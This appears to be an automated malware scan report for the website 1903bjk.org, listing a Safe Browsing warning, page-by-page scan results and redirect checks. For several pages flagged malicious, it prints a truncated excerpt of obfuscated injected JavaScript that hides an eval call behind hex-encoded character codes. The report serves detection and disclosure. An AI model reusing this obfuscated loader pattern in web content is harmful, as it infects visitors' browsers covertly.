Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1903bjk.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://1903bjk.org/ | 200 OK Content-Length: 15333 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
| ||
http://1903bjk.org/cache/js-566f86698f4de6545c2628c211b5aa34.php | 200 OK Content-Length: 303842 Content-Type: application/x-javascript | clean |
http://1903bjk.org/index.php/kurulus | 200 OK Content-Length: 15385 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
| ||
http://1903bjk.org/cache/js-629447fa53df2e7e4bafb1309c631e57.php | 200 OK Content-Length: 300868 Content-Type: application/x-javascript | clean |
http://1903bjk.org/index.php/tesisler-ve-dernekler | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://1903bjk.org/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://1903bjk.org/index.php/branslar | 200 OK Content-Length: 28013 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
| ||
http://1903bjk.org/index.php/forum | 200 OK Content-Length: 33495 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
| ||
http://1903bjk.org/cache/js-9f3e55f8282f383d704ea5bf4fe23087.php | 200 OK Content-Length: 300830 Content-Type: application/x-javascript | clean |
http://1903bjk.org/index.php/2012-06-14-16-29-09 | 200 OK Content-Length: 15946 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
| ||
http://1903bjk.org/cache/js-43cfac18a3c2398440e511885de7dbb0.php | 200 OK Content-Length: 300913 Content-Type: application/x-javascript | clean |
http://1903bjk.org/index.php/sezonlar-kadrolar | 200 OK Content-Length: 12163 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
| ||
http://1903bjk.org/index.php/iletisim | 200 OK Content-Length: 14521 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,6e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,6e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,5c,59,6a,5c,5e,6c,69,66,6a,25,5a,60,64,25,59,69,26,5 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1903bjk.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 07 Jul 2014 00:41:18 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 79b2316a274abae78f005d3d144fbe0f=0d78e41e3a7df3131ba581959583cafd; path=/
GET / HTTP/1.1
Host: 1903bjk.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 07 Jul 2014 00:41:18 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 79b2316a274abae78f005d3d144fbe0f=0d78e41e3a7df3131ba581959583cafd; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1903bjk.org
Referer: http://www.google.com/search?q=1903bjk.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 1903bjk.org
Referer: http://www.google.com/search?q=1903bjk.org
Result:
The result is similar to the first query. There are no suspicious redirects found.